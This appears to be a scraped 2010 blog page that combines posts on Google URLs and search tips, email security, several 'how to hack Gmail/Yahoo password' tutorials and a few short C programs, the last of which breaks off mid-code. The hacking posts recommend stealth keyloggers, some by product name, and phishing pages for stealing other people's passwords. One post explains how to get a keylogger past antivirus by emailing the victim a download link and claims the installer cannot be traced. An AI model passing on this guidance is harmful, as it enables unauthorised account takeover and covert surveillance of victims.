Wednesday, April 14, 2010

Inside GoOgLe – A Collection of Strange Links on Google

Although Google is a search engine,it’s also a website.It has millions of it’s own pages indexed in it.When i was digging deep inside Google i found some strange links inside it.So I decided to compile a list of strange Google links. Enjoy!




1.If you ever wondered all the misspellings of Britney Spears and their volume, you must check this out. http://www.google.com/jobs/britney.html



2.These two links are to fun Google games

http://www.google.com/Easter/feature_easter.html

http://www.google.com/heart/heart01.html



3.Quench your thirst for knowledge with Google Gulp

www.google.com/googlegulp/



4.Check out Google’s latest ideas

http://www.google.com/experimental/



5.If you are fond of puzzles

http://www.google.com/puzzles/



6.Tribute to Moms

http://www.google.com/moms01/



7.Google Mobile maps

http://www.google.com/mobile/gmm/index.html



8.http://www.google.com/tofc/



9.Are you scary smart?

http://www.google.com/scarysmart/



10.Google press center

http://www.google.com/press/



11.Google apps

http://www.google.com/a/help/intl/en/var_0.html



12Mind-racing problems.

http://www.google.com/indiacodejam/



13.Doodle 4 Google

http://www.google.com/doodle4google/



14.The virgle

http://www.google.com/virgle/



15.Google Alerts

http://www.google.com/alerts



16.Urchin Software from Google

http://www.google.com/urchin/



17.Google dictionary

http://www.google.com/translate_dict



18.Inside google

http://www.google.com/plex/



19.Movie reviews

http://www.google.com/reviews



20.GOOGLE MARS

http://www.google.com/mars/



21.GOOGLE SKY

http://www.google.com/sky/



22.Google’s next Coding Competition site

http://www.google.com/codejam/



23.http://www.google.com/pda

24.http://www.google.com/m

25.http://www.google.com/imode/

26.http://www.google.com/jsky



27.Blog search

http://www.google.com/blogsearch



28.Microsoft on google

http://www.google.com/microsoft



29.GOOGLE MOON

http://www.google.com/moon/



30.Google Linux

http://www.google.com/linux



30.http://www.google.com/ie



31.Google tour

http://www.google.com/tour/services/



32.Google TOS

http://www.google.com/accounts/TOS



33.Google trends

http://www.google.com/trends/hottrends



34.Google arts

http://www.google.com/Top/Arts/



35.Google 3d warehouse

http://www.google.com/sketchup/3dwh/



36.Google Adult content

http://www.google.com/Top/Adult/



37.Google & Dilbert Doodle

http://www.google.com/dilbert.html



38.Google in Kannada

www.google.com/intl/kn/



29.Google strange logos

http://www.google.com/doodle8.html

http://www.google.com/doodle9.html



30.Win Registry files in google

www.google.com/google_rsearch.reg



31.Google Universities Search

http://www.google.com/options/universities.html



Oops there’s still lot more.But only this much for now….

Advanced Google Search


In this post I will show you some of the secrets of Advanced Google Search.



Google is clearly the best general-purpose search engine on the Web.But most people don’t use it to its best advantage or in an advanced way. Do you just plug in a keyword or two and hope for the best? That may be the quickest way to search, but with more than 3 billion pages in Google’s index, it’s still a struggle to pare results to a manageable number. There are some ways in which advanced Google search can be used to get the desired results.



But Google is an remarkably powerful tool that can ease and enhance your Internet exploration. Advanced Google search options go beyond simple keywords, the Web, and even its own programmers. Let’s look at some of the advanced Google search options.



Syntax Search Tricks



Using a special syntax is a way to tell Google that you want to restrict your searches to certain elements or characteristics of Web pages.Here are some advanced Google search operators that can help narrow down your search results.

1.Intitle: at the beginning of a query word or phrase (intitle:”Three Blind Mice”) restricts your search results to just the titles of Web pages.



2.Intext: does the opposite of intitle:, searching only the body text, ignoring titles, links, and so forth. Intext: is perfect when what you’re searching for might commonly appear in URLs. If you’re looking for the term HTML, for example, and you don’t want to get results such as



www.gohacking.com/index.html

you can enter intext:html



3.Link: lets you see which pages are linking to your Web page or to another page you’re interested in. For example, try typing in

link:http://www.downarchivestuff.blogspot.com/



3.site: (which restricts results to top-level domains) with intitle: to find certain types of pages. For example, get scholarly pages about Mark Twain by searching for intitle:”Mark Twain”site:edu. Experiment with mixing various elements; you’ll develop several strategies for finding the stuff you want more effectively. The site: command is very helpful as an alternative to the mediocre search engines built into many sites.



Swiss Army Google



Google has a number of services that can help you accomplish tasks you may never have thought to use Google for. For example, the new calculator feature

(www.google.com/help/features.html#calculator)

lets you do both math and a variety of conversions from the search box. For extra fun, try the query “Answer to life the universe and everything.”



Suppose you want to contact someone and don’t have his phone number handy. Google can help you with that, too. Just enter a name, city, and state. (The city is optional, but you must enter a state.) If a phone number matches the listing, you’ll see it at the top of the search results along with a map link to the address. If you’d rather restrict your results, use rphonebook: for residential listings or bphonebook: for business listings. If you’d rather use a search form for business phone listings, try Yellow Search

(www.buzztoolbox.com/google/yellowsearch.shtml).

Let Google help you figure out whether you’ve got the right spelling—and the right word—for your search. Enter a misspelled word or phrase into the query box (try “thre blund mise”) and Google may suggest a proper spelling. This doesn’t always succeed; it works best when the word you’re searching for can be found in a dictionary. Once you search for a properly spelled word, look at the results page, which repeats your query. (If you’re searching for “three blind mice,” underneath the search window will appear a statement such as Searched the web for “three blind mice.”) You’ll discover that you can click on each word in your search phrase and get a definition from a dictionary.



Extended Googling

Google offers several advanced services that give you a head start in focusing your search. Google Groups

(http://groups.google.com//)



indexes literally millions of messages from decades of discussion on Usenet. Google even helps you with your shopping via two tools: FroogleCODE(http://froogle.google.com//),



which indexes products from online stores, and Google CatalogsCODE(http://catalogs.google.com//),



which features products from more 6,000 paper catalogs in a searchable index. And this only scratches the surface. You can get a complete list of Google’s tools and services at

www.google.com/options/index.html



You’re probably used to using Google in your browser. But have you ever thought of using Google outside your browser?

Google Alert

(http://www.googlealert.com/)



monitors your search terms and e-mails you information about new additions to Google’s Web index. (Google Alert is not affiliated with Google; it uses Google’s Web services API to perform its searches.) If you’re more interested in news stories than general Web content, check out the beta version of Google News Alerts

(www.google.com/newsalerts).



This advanced Google service (which is affiliated with Google) will monitor up to 50 news queries per e-mail address and send you information about news stories that match your query. (Hint: Use the intitle: and source: syntax elements with Google News to limit the number of alerts you get.)

Google on the telephone? Yup. This service is brought to you by the folks at Google Labs

(http://labs.google.com//),

a place for experimental Google ideas and features (which may come and go, so what’s there at this writing might not be there when you decide to check it out).



With Google Voice Search

(http://labs1.google.com/gvs.html),



you dial the Voice Search phone number, speak your keywords, and then click on the indicated link. Every time you say a new search term, the results page will refresh with your new query (you must have JavaScript enabled for this to work). Remember, this service is still in an experimental phase, so don’t expect 100 percent success.

In 2002, Google released the Google API (application programming interface), a way for programmers to access Google’s search engine results without violating the Google Terms of Service. A lot of people have created useful (and occasionally not-so-useful but interesting) applications not available from Google itself, such as Google Alert. For many applications, you’ll need an API key, which is available free fromCODE www.google.com/apis

How to Hack Gmail Account

Gmail is one of the most widely used email services across the globe and it’s no wonder why many people want to hack gmail. So if you are curious to know how to hack a gamil account then this is the post for you. Here in this post I will show you some of the real and working ways to hack gmail and will also make you aware of the common scams and myths associated with hacking gmail.



Before I discuss how to hack gmail I want to make my readers aware of the common scams and myths associated with hacking gmail or any other email. So here we go

1. There is no ready made software/program that will hack gmail just with a click of a button. So never get fooled by something called gmail hacking software. If there exists such program to hack gmail then it’s no more than a scam.
2. Most of the email hacking services on the internet claim to hack gmail password for just a small fee. I have personally tested many of those services and found that most of them are scams.

At this point you may be wondering what are the other ways to hack gmail then. So here are the working ways to hack gmail.


With my experience in the field of hacking and security I can tell you that there are only two ways to hack gmail account.



1. Keylogging
2. Phishing



Any other method to hack gmail other than these two are simply scam or dont work.

Easiest Way to Hack Gmail

The easiest way to hack gmail is through keylogging. It is done using a small program/software called keylogger. This keylogger when installed on any computer will capture each and every keystroke including passwords. Also it works in complete stealth mode by completely hiding itself. So installing a keylogger on the computer is the easiest way to hack gmail. Once the victim logs into his gmail account from this computer his gmail username & password are captured and stored instantly. The stored logs are sent to you via email. But what if you do not have physical access to the computer? Well, still you need not worry since I am going to suggest one of the best keylogger program that support installation on a local computer as well as a remote computer.


So to hack any gmail account all you need to do is install the keylogger on the computer from which the victim is likely to login to his gmail account. If you do not have physical access then you need to use the remote installation feature to remotely deploy the kelogger.



NOTE: For more details on keylogger read my post How to use Keyloggers





Other ways to Hack Gmail


The other most commonly used trick to hack Gmail is using a Fake Login Page (also called as Phishing). Today, Fake login pages are the most widely used techniques to hack Gmail. A Fake Login page is a page that appears exactly as a Login page of sites like Yahoo, Gmail etc. But once we enter our password there, we end up loosing it.



However creating a fake login page and taking it online to successfully hack a Gmail password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So if you are new to the concept of hacking passwords, then I recommend using the keyloggers to hack Gmail since it’s the easiest way.

Use Gmail Account to Send Emails from Multiple Addresses

In this post I am going to show you how to use your Gmail account to send and receive emails from multiple addresses. Most of us own more than one email account say for example, one from Gmail, one from Yahoo and one from Hotmail. If you are tired of logging into multiple accounts to check your inbox or to send emails, I have a solution here.




Gmail has an option to integrate multiple email accounts (email addresses) into a single Gmail account. Once you integrate multiple email addresses into your Gmail account, you can use the same account to send emails from different addresses and receive emails for different addresses. Let’s take a simple example



Suppose you have three email addressess (email accounts)


1. gohacking@gmail.com

2. gohacking@yahoo.com

3. hacker@hotmail.com



You can integrate the emails gohacking@yahoo.com and hacker@hotmail.com to gohacking@gmail.com and operate all the three accounts from your single gmail account. Here is a step-by-step procedure to do this.



1. Login to your gmail account.

2. Click on Settings at the top right corner.

3. Under Settings, click on Accounts tab.

4. Now you’ll see the first option “Send mail as:“

5. Under this option, click on Add another email address you own

6. Now a small new window will pop-up asking you to enter the details of your new email address.

7. Here you can enter any name and any email address. The email address need not belong to gmail only. You can enter your yahoo, hotmail or any other valid email address.

8. A Verification email will be sent to the address that you specify. Once you verify that you own the email address, it will be integrated to your Gmail account.



Now when you compose a new email, you’ll see an option to select from multiple address to send the mail. Also you’ll receive the incoming mails for multiple addresses to a single mailbox. I hope this will benefit you.



Before you leave, I should also tell you one good advantage of this. According to Gmail privacy policy, they will not send the user’s IP address in the outgoing emails. That means when you send an email from your Gmail account , the receiver will not be able to find out your IP address. But you don’t have this advantage in Yahoo or other email providers.



Please share your opinions through comments. I hope this helps….

A Closer Look at a Vulnerability in Gmail

Gmail is one of the major webmail service provider across the globe. But as we all know Gmail still carries that 4 letter word BETA. Sometimes we may wonder, why Gmail is still in the testing stage even after years of it’s emergence. Here is one small reason for that.




Gmail follows a strict rule that doesn’t allow it’s users to have their first or the last name contain the term Gmail or Google. That is, while signing up for a new Gmail account the users cannot choose a first or last name that contains the term Gmail or Google. You can see this from the below snapshot.







This rule is implemented by Gmail for obvious reasons, because if the users are allowed to keep their first or the last name that contains the term Gmail or Google, then it is possible to easily impersonate the identity of Gmail (or Gmail Team) and engage themselves in phising or social engineering attacks on the innocent users. This can be done by simply choosing the first and last name with the following combinations.



First Name Last Name



Gmail Team



Google Team



Gmail Password Assistance



From the above snapshot we can see that, Gmail has made a good move in stopping the users from abusing it’s services. However this move isn’t just enough to prevent the malicious users from impersonating the Gmail’s identity. Because Gmail has a small vulnerability that can be exploited so that the users can still have their name contain the terms Gmail or Google. You may wonder how to do this. But it’s very simple.



1. Login to your Gmail account and click on Settings.



2. Select Accounts tab



3. Click on edit info



4. In the Name field, select the second radio button and enter the name of your choice. Click on Save Changes and you’re done!



Now, Gmail accepts any name even if it contains the term Google or Gmail. You can see from the below snapshot







Allowing the users to have their names contain the terms Gmail or Google is a serious vulnerability even though it doesn’t seem to be a major one. This is because a hacker or a malicious attacker can easily exploit this flaw and send phishing emails to other Gmail users asking for sensitive information such as their passwords. Most of the users don’t even hesitate to send their passwords since they believe that they are sending it to Gmail Team (or someone authorized). But in reality they are sending it to an attacker who uses these information to seek personal benefits.



So the bottomline is, if you get any emails that appears to have come from the Gmail Team or similar, don’t trust them! Anyone can send such emails to fool you and take away your personal details. Hope that Gmail will fix this vulnerability as soon as possible to avoid any disasters.

Phishing Tools Available Online

Tools that can help people potentially defraud innocent surfers are available for free download on the internet, it has been claimed.




The do-it-yourself kits provide all the essential tools for launching phishing attacks – those that use spoofed emails and fraudulent websites to trick people into giving out personal financial data.



Phishing scams are on the up. Security company MessageLabs has intercepted an average of 250,000 phishing emails a month so far in 2004, compared to just 14 phishing-related emails back in August 2003.



According to anti-virus company Sophos, the DIY kits contain all the graphics, web code and text required to construct fake websites that look like legitimate online banking or shopping sites. They also include spamming software which would let you send out millions of phishing emails as bait for potential victims.



“Until now, phishing attacks have been largely the work of organised criminal gangs, however, the emergence of these ‘build your own phish’ kits mean that any old Tom, Dick or Harry can now mimic bona fide banking websites and convince customers to disclose sensitive information such as passwords, PIN numbers and account details,” said a spokesman for Sophos.



“There is plenty of profit to be made from phishing. By putting the necessary tools in the hands of amateurs, it’s likely that the number of attacks will continue to rise.”



Surfers that receive a suspicious email that claims to come from an online bank or e-commerce site should delete them and not click on any included links

How to Protect an Email Account from being Hacked

Today in this post I’ll teach you how to protect your email account from being hacked. Nowadays I get a lot of emails where most of the people say “My Email account is hacked please help…”. Now one question which arises in our mind is:”Is it so easy to hack an email account? OR Is it so difficult to protect an email account from being hacked?”. The single answer to these two questions is “Absolutely NOT!”. It is neither easy to hack an email nor difficult to protect an email account from bieng hacked.




If this is the case, then what is the reason for many people to loose their accounts?

The answer is very simple. They don’t know how to protect themselves from being hacked! In fact most of the people who loose their email accounts are not the victims of hacking but the victims of Trapping. They loose their passwords not because they are hacked by some expert hackers but they are fooled to such an extent that they themselves give away their password.



Are you confused? If so continue reading and you’ll come to know…



Now I’ll mention some of the most commonly used online scams which fool people and make them loose their passwords. I’ll also mention how to protect your email account from these scams.



1. WEBSITE SPOOFING



Website spoofing is the act of creating a website, with the intention of misleading the readers. The website will be created by a different person or organisation (Other than the original)especially for the purposes of cheating. Normally, the website will adopt the design of the target website and sometimes has a similar URL.



For example a Spoofed Website of Yahoo.com appears exactly same as Yahoo Website. So most of the people believe that it is the original site and loose their passwords. The main intention of spoofed websites is to fool users and take away their passwords. For this,the spoofed sites offer fake login pages. These fake login pages resemble the original login pages of sites like Yahoo,Gmail,Orkut etc. Since it resemble’s the original login page people beleive that it is true and give away their username and passwords by trying to login to their accounts.



Solution:



■Never try to login/access your email account from the sites other than the original site.

■Always type the URL of the site in the address bar to get into the site.Never click on the hyperlink to enter the site.

2. BY USING KEYLOGGERS



The other commonly used method to steal password is by using a Keylogger. A Keylogger is nothing but a spyware. The detailed description of keylogger and it’s usage is discussed in the post Hacking an email account. If you read this post you’ll come to know that it is too easy to steal the password using a keylogger program. If you just access your email account from a computer installed with keylogger, you definitely loose your password. This is because the keylogger records each and every keystroke that you type.



Solution:



Protecting yourselves from a keylogger scam is very easy.Just install a good anti-spyware program and update it regularly. This keeps your PC secure from a keylogger. Also there is a program called Anti-keylogger which is specially designed to detect and remove keyloggers. You can use this program to detect some stealth keyloggers which remain undetected by many anti-spyware programs.

3. ACCESSING YOUR EMAIL ACCOUNT FROM CYBER CAFES



Do you access your email from cyber cafes? Then definitely you are under the risk of loosing your password.In fact many people loose their email account in cyber cafes. For the owner of the cyber cafe it’s just a cakewalk to steal your password. For this he just need’s to install a keylogger on his computers. So when you login to your email account from this PC, you give away your password to the cafe owner. Also there are many Remote Administration Tools (RATs) which can be used to monitor your browsing activities in real time.



This doesn’t mean that you should never use cyber cafes for browsing the internet. I know, not all the cyber cafe owners will be so wicked but it is recommended not to use cafes for accessing confidential information. If it comes to the matter of security never trust anyone, not even your friend. I always use my own PC to login to my accounts to ensure safety.



So with this I conclude my post and assume that I have helped my readers to protect their email accounts from being hacked. Please pass your comments…

Tips to Improve Email Privacy

Many websites ask for your email address when you shop online, download a free software etc. But do you know that this has a chance of affecting your email privacy through Spam emails?




Though most websites don’t use spamming as an email marketing strategy, there are a few that use junk emails that don’t care about anti-Spam laws. Here are some tips to maintain your email privacy from such threats.

Before submitting your email address you need to check the reputation of the company. Reputed websites would normally follow the right email practices to ensure your email privacy. Such companies will never want to loose their hard earned reputation by getting blammed for spamming.



See whether the websites provides email privacy statements. You need to go through these statement in detail, and know about the kind of emails that will be sent to you, how often etc. Based on this you can decide on whether you need such emails. You don’t want to give your email address to some fraud company that is thinking about handing over your email address to hundreds of other websites.



Finally, check whether the website really respects your privacy. Often you will find some text like “I agree to receive email” that comes with a check box. You can agree to receive emails by checking the check box. If the check box is already checked, it is just a good indication that the website doesn’t respect your privacy. So watch out!

Tips to Find Unauthorized Activity on Your Email Account


Do you suspect that your email account is under attack? Do you want to maintain total security of your email account and make it 100% hack proof? Well, Some times our email account might have got hacked and we may not be aware of that. We may believe that our email account is safe, but in reality our private and confidential information may be falling into the hands of a third person.


Here are some signs of unauthorized activity on an email account.


1. Your new emails are marked as Read even if you’ve not read them.

2. Your emails are moved to Trash or even permanently deleted without your notice.

3. Your emails are being forwarded to a third party email address (check your settings->forwarding).

4. Your secondary email address is changed.



If you come across any of the above activities on your email account, then it is a clear indication that your email account is hacked.


Additional Security Features in Gmail to ensure the Safety of your Account



Gmail provides an additional security feature to protect your email account through the means of IP address logging. That is, Gmail records your IP address every time you login to your Gmail account. So, if a third party gets access to your account then even his/her IP is also recorded. To see a list of recorded IP address, scroll down to the bottom of your Gmail account and you’ll see something like this.




You can see from the above figure that Gmail shows the IP address of last login (last account activity). You can click on Details to see the IP address of your last 5 activities. If you find that the IP listed in the logs doesn’t belong to you, then you can suspect unauthorized activity.



Steps to be carried out to stop unauthorized activity on your email account



If you feel/suspect that your account is hacked then you must immediately take the actions mentioned below



1. Change your Password

2. Change your security question.

2. Remove any third party email address (if any) to which your account is set to forward emails.

3. Make sure that you can access the email account of your secondary email address.

4. Also change you secondary email password and security question.



This ensures that your account is safe from future attacks. But I strongly recommend that you read the following post to protect your email account from being hacked.



How to Protect Your Email Account from being Hacked



Please pass your comments and express your opinions.

How to Protect an Email Account from SPAM

Most of us get SPAM every day. Some of us get more and some little. Even a newly created email account will begin to receive spam just after a few days of it’s creation. Many times we wonder where these spam come from and why? But this question remains unanswered within ourselves. So in this post I will try my best to give every possible information about the spam and will also tell you about how to combat spam.




What is SPAM?



Spam is the abuse of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited bulk messages indiscriminately. Most widely recognized form of spam is email spam.



Where do these SPAM come from?



These spam come only from spammers and never from a legitimate user or a company. These spammers send a single email to hundreds (some times thousands or millions) of email addresses at a time. They either send it manually or use spambots to automate the process of spamming.



Why do spammers SPAM?



The main goal of spammers is to send the spam (unsolicited bulk messages) to as many people as possible in order to make profit. For example, John builds a small website to sell an ebook which gives information about weight loss. In order to make sales he needs publicity for his website. Instead of spending money on advertising, John decides to create an email which contains information about his site along with it’s link and send this email to say 100 email addresses in his contact list. If 1 person out of hundred buy this book john gets $10. What if he sends this email to 1000s of email addresses. He gets $100. Imagine, if he sends this email to 1 Million email addresses he gets $100000.



Now I hope you understood the idea behind spamming. So in order to make money, spammers send their advertising emails to as many people as possible without respecting the recipient’s privacy.



From where do SPAMmers get my email address?



On the Internet there exists many sites who collect the email IDs of people and sell them to spammers in bulk. Most often, people sign up for monthly newsletters and take up surveys. This is the time where these scam sites get their email addresses. Also many spammers collect email addresses by using spambots. These spambots collect email addresses from the Internet in order to build mailing lists. Such spambots are web crawlers that can gather email addresses from Web sites, newsgroups, forums, special-interest group (SIG) postings, and chat-room conversations.



Spammers also use the trick of creating Hoax Emails for gathering a huge list of email IDs. For example, a spammer sends a hoax email which says “Forward this Message to Help Severely Burned Child”. This email claims that 11 cents will be donated to the child’s family every time the message is sent to others. Most of the people believe this and start forwarding this hoax email to all of the IDs in their contact list. In this way the email spreads rapidly and eventually when it reaches the creator (spammer), the spammer gets a huge list of valid email addresses in the email header. When you get these kind of hoax emails, you can see for yourself in the email header which contains a huge list of email addresses of all those people to whom the email is being forwarded to. This is one of the effective methods used by spammers to gather email addresses.



Is SPAMming legal?



Spamming is completely illegal. Yet it is really difficult to stop spammers from spamming since they keep moving from one hosting company to another after getting banned. This makes it practically impossible to catch spammers and prosecute them.



How to protect my email account from getting SPAMmed?



The following methods can be used to combat email spam.



1. Use spam filters for your email account. If you’re using email services like Gmail, Yahoo, Hotmail etc. then spam filters are used by defaut. Each spam filter has it’s algorithm to detect spam emails and will automatically move them to SPAM folder. This keeps your inbox free from spam. However some spam emails become successful to make their way into the inbox by successfully bypassing the filters.



2. Do not post your email address in public forums, user comments and chat-rooms. Give your email address only to trustworthy websites while signing up for newsletters.



3. While taking up online surveys and filling up feedback forms, it is better not to give your personal email address. Instead singup for a dummy email account and use this for surveys and feedback forms.



4. While posting your contact email address on your website use this format: emailaddress [at] yoursite.com instead of emailaddress@yoursite.com. This protects your email address from being indexed by spambots.



5. Do not respond to hoax messages. When you receive a hoax email, avoid forwarding it to your friends. Examples of hoax messages can be found at http://www.hoax-slayer.com/. If you really want to forward it to your friends, make sure that you use “Bcc” (blind carbon copy) option to send the email. This will hide all the email IDs to which the mail is forwarded to.



I hope this helps. Pass your suggestions and feedback via comments

How to Hack a Yahoo Password

Everyday I get a lot of emails from people asking how to hack a Yahoo password? So if you’re curious to know how to hack Yahoo then this is the post for you. In this post I will give you the real and working ways to hack Yahoo password.





Is it possible to hack Yahoo?



Yes! As a matter of fact it’s possible to hack almost any email password. But before you learn the real ways to hack Yahoo password, the following are the things you should be aware of.



1. There is no ready made software or program that can hack a Yahoo password just by entering the target username. If you come accross a site that claims to sell such Yahoo password hacking software then it’s 100% scam.
2. Never trust any Hacking Service that claims to hack Yahoo password just for $100 or $200. All the hacking services are scams.


3. With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack Yahoo password: They are Keylogging and Phishing. All the other password hacking methods are simply scam or don’t work! The following are the only 2 working and foolproof methods to hack Yahoo password.



1. EASIEST WAY TO HACK YAHOO


Using keylogger is the easiest way to hack a Yahoo password. A keylogger is a small program that records each and every keystroke (including passwords) that a user types on a specific computer’s keyboard. A keylogger is also called as Spy program or Spy software. To use it you don’t need to have any special knowledge. Anyone with a basic knowledge of computer can use it. With my experience I recommend the following keylogger as the best for hacking Yahoo password.

Can I be traced back if I install it on some other computer?




No, it’s almost impossible to trace back to you for installing the keylogger on other’s PC.



What if the antivirus block from sending it as an email attachment?


Instead of sending the keylogger as an email attachment, you place the file in .ZIP/.RAR format and upload it to www.fileden.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.



2. OTHER WAYS TO HACK YAHOO




The other most commonly used trick to hack Yahoo password is using a Fake Login Page (also called as Phishing). Today, Fake login pages are the most widely used techniques to hack Yahoo password. A Fake Login page is a page that appears exactly as a Login page of sites like Yahoo, Gmail etc. But once we enter our password there, we end up loosing it.



However creating a fake login page and taking it online to successfully hack a Yahoo password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So if you are new to the concept of hacking passwords, then I recommend using the keyloggers to hack Yahoo password since it’s the easiest way.

Email Hacking Software

Password Hacking Software, Email Hacking Software, Yahoo Password Hacking Software, Hotmail Password Hacking Software…




Don’t get fooled by these words. Learn the Real of of hacking email passwords. Identify which Hacking Softwares work and which doesn’t. Most of us are very curious about a software that can hack email passwords. In fact most of the searches about hacking contain the keyword email hacking software or password hacking software. But is it really possible to hack an email using a software? Does there exist a software to hack email passwords? In this post I’ll explain every possible information that you need to know about an email hacking software.





Email Hacking Software – Explained



THINGS YOU SHOULD KNOW BEFORE PROCEEDING



Many sites on the internet claim to sell softwares/programs to hack email passwords. I know most of you are aware of this. These sites also boast that their software can hack email passwords with in minutes. Some sites also claim that they can hack any one’s password for money (say $100). Never believe these sites. They are all scam! I can dare challenge anyone who claims to hack an email, using a software program. In fact when I was a newbie in the field of Hacking, I have spent many sleepless nights in search of an Email hacking software. Finally I ended up only with frustration and nothing more than that. I don’t want my readers to commit the same mistake which I did. So, never believe those scam sites and empty your pockets by spending on useless softwares.







SO, HOW CAN I HACK AN EMAIL PASSWORD ?



The story doesn’t end up here. It is still possible to hack an email password and several opportunities to do that are still open for you. In this post I’ll discuss the easiest way to hack an email password. For this you need not be an expert hacker or have any knowledge of hacking. Yes believe me, it’s possible. All you have to do is just use Keyloggers. Here are some of the Frequently Asked Questions about keyloggers.







What is a keylogger ?



A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. Keylogger is the easiest way to hack an email account.



A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password. Even though keylogger software is not meant for hacking passwords, you can use them to hack email passwords.

How to Hack Gmail Account

Gmail is one of the most widely used email services across the globe and it’s no wonder why many people want to hack gmail. So if you are curious to know how to hack a gamil account then this is the post for you. Here in this post I will show you some of the real and working ways to hack gmail and will also make you aware of the common scams and myths associated with hacking gmail.




Before I discuss how to hack gmail I want to make my readers aware of the common scams and myths associated with hacking gmail or any other email. So here we go



1. There is no ready made software/program that will hack gmail just with a click of a button. So never get fooled by something called gmail hacking software. If there exists such program to hack gmail then it’s no more than a scam.

2. Most of the email hacking services on the internet claim to hack gmail password for just a small fee. I have personally tested many of those services and found that most of them are scams.



At this point you may be wondering what are the other ways to hack gmail then. So here are the working ways to hack gmail.



With my experience in the field of hacking and security I can tell you that there are only two ways to hack gmail account.



1. Keylogging
2. Phishing

Any other method to hack gmail other than these two are simply scam or dont work.

Easiest Way to Hack Gmail





The easiest way to hack gmail is through keylogging. It is done using a small program/software called keylogger. This keylogger when installed on any computer will capture each and every keystroke including passwords. Also it works in complete stealth mode by completely hiding itself. So installing a keylogger on the computer is the easiest way to hack gmail. Once the victim logs into his gmail account from this computer his gmail username & password are captured and stored instantly. The stored logs are sent to you via email. But what if you do not have physical access to the computer? Well, still you need not worry since I am going to suggest one of the best keylogger program that support installation on a local computer as well as a remote computer. The following supports remote installation as well.



SniperSpY




So to hack any gmail account all you need to do is install the keylogger on the computer from which the victim is likely to login to his gmail account. If you do not have physical access then you need to use the remote installation feature to remotely deploy the kelogger.



NOTE: For more details on keylogger read my post How to use Keyloggers



Other ways to Hack Gmail





The other most commonly used trick to hack Gmail is using a Fake Login Page (also called as Phishing). Today, Fake login pages are the most widely used techniques to hack Gmail. A Fake Login page is a page that appears exactly as a Login page of sites like Yahoo, Gmail etc. But once we enter our password there, we end up loosing it.



However creating a fake login page and taking it online to successfully hack a Gmail password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. So if you are new to the concept of hacking passwords, then I recommend using the keyloggers to hack Gmail since it’s the easiest way.

How to Hack an Email using Hardware Keylogger

Did you know that keyloggers are the simplest way to hack an email password?. Today I’ll be giving you a detailed information on hardware keyloggers and their use.I will also teach how to hack an email using hardware keylogger. If you are new to the concept of keyloggers or haven’t read my previous post about email hacking then you must refer my previous post Hacking an email account. Here i’ll give a breif description about keyloggers.




A software keylogger (or simple keylogger) is a stealth computer program that captures every keystroke entered through the keyboard.



Now i’ll tell you what is a hardware keylogger and how it can be used for hacking an email.



Hardware Keyloggers are used for keystroke logging, a method of capturing and recording computer user keystrokes. They plug in between a computer keyboard and a computer and log all keyboard activity to an internal memory. They are designed to work with PS/2 keyboards, and more recently with USB keyboards. A hardware keylogger appears simply as a USB pendrive (thumb drive) or any other computer peripheral so that the victims can never doubt that it is a keylogger. So by looking at it’s appearence it is not possible to identify it as a keylogger. Here are some of the images of hardware keyloggers for your convenience.









So by looking at the above images we can come to know that hardware keyloggers look just like any USB or PS/2 device. So it is very hard to identify it as a keylogger.



Insatalling a Hardware Keylogger to Hack the Email Password


The hardware keylogger must be installed between the keyboard plug and the USB or PS/2 port socket. That is you have to just plug in the keylogger to your keyboard’s plug (PS/2 or USB) and then plug it to the PC socket. The following image shows how the keylogger is installed.





Once you install the hardware keylogger as shown in the above two images the keylogger starts recording each and every keystroke of the keyboard including email passwords and other confidential information. The hardware keylogger has an inbuilt memory in which the logs are stored.

Common Email Hacking Methods

Gone are the days when email hacking was a sophisticated art. Today any body can access hacking tips through the Internet and start hacking your yahoo or hotmail account. All that is needed is doing a search on google with keywords like “how to hack yahoo”, “hack yahoo messenger”, “hotmail hack program” etc. The following article is not an effort to teach you email hacking, but it has more to do with raising awareness on some common email hacking methods.




Hackers can install keylogger programs in the victim’s computer. This program can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden. After installation, the hacker will use a password and hot keys to enable the keylogger. He can then use the hot keys and password to access your key entry details.



A keylogger program is widely available on the internet.some of them are listed below



Win-Spy Monitor



Realtime Spy



SpyAgent Stealth



Spy Anywhere



For more information on keyloggers and it’s usage refer my post Hacking an email account.



Even if direct access to your computer is not possible, hackers can still install a key logger from a remote place and access your computer using Remote Administration Tools (RATs).



Another way of getting your password is the use of fake login pages that look exactly like the real one. So, beware of the webpages you visit. Also if you find your computer behaving oddly, there is a chance that some spy program is running. On such occasions it is better to try and remove the malware or reformat the entire hard disk.A detailed Email Hacking tutorial is discussed in the post Hacking an email account.

C Program to Print a Character without using any Output Statements

This program can be used to print character without using any output statements. This program only works in 16-bit mode since it directly writes to VDU Memory.







#include

#include

void main()

{

char far *p=(char far *)0xb8000000;

*p=’A';

getch();

}

Program to Print it’s Own Source Code

Here is a C program to print it’s own source code.That is the output of this program is exactly same as it’s source code.Here’s the program




#include

char *program=”#include%cchar *

program=%c%s%c;%cvoid main()%c{%cprintf

(program,10,34,program,34,10, 10,10,10);%c}”;

void main()

{

printf(program,10,34,program,34,10,10,10,10);

}

C Program to display the No. of Digits in an Entered Number

This program displayes the number of digits present in the number that is entered through the input.




#include

#include



void main()

{

unsigned long int num;

int i=0;

clrscr();

printf(“Enter the digit\n”);

scanf(“%lu”,&num);

while(num!=0)

{

num=num/10;

++i;

}

printf(“Length=%d”,i);

getch();

}

C Program to Print the Entered Number in Words

The following C program print’s the entered number in words.For example if the number entered is 12345 then the program prints the entered number in words as One Two Three Four Five







#include

void main()

{

int i=0;

unsigned long int digit;

char str[12],ch;

puts(“Enter the number (less than 10 digit)”);

scanf(“%lu”,&digit);

ultoa(digit,str,10); /*converts an unsigned long int to string*/

while(str[i]!=’\0′)

{

ch=str[i];

i++;

switch(ch)

{

case ‘1′:

printf(“ONE “);

break;

case ‘2′:

printf(“TWO “);

break;

case ‘3′:

printf(“THREE “);

break;

case ‘4′:

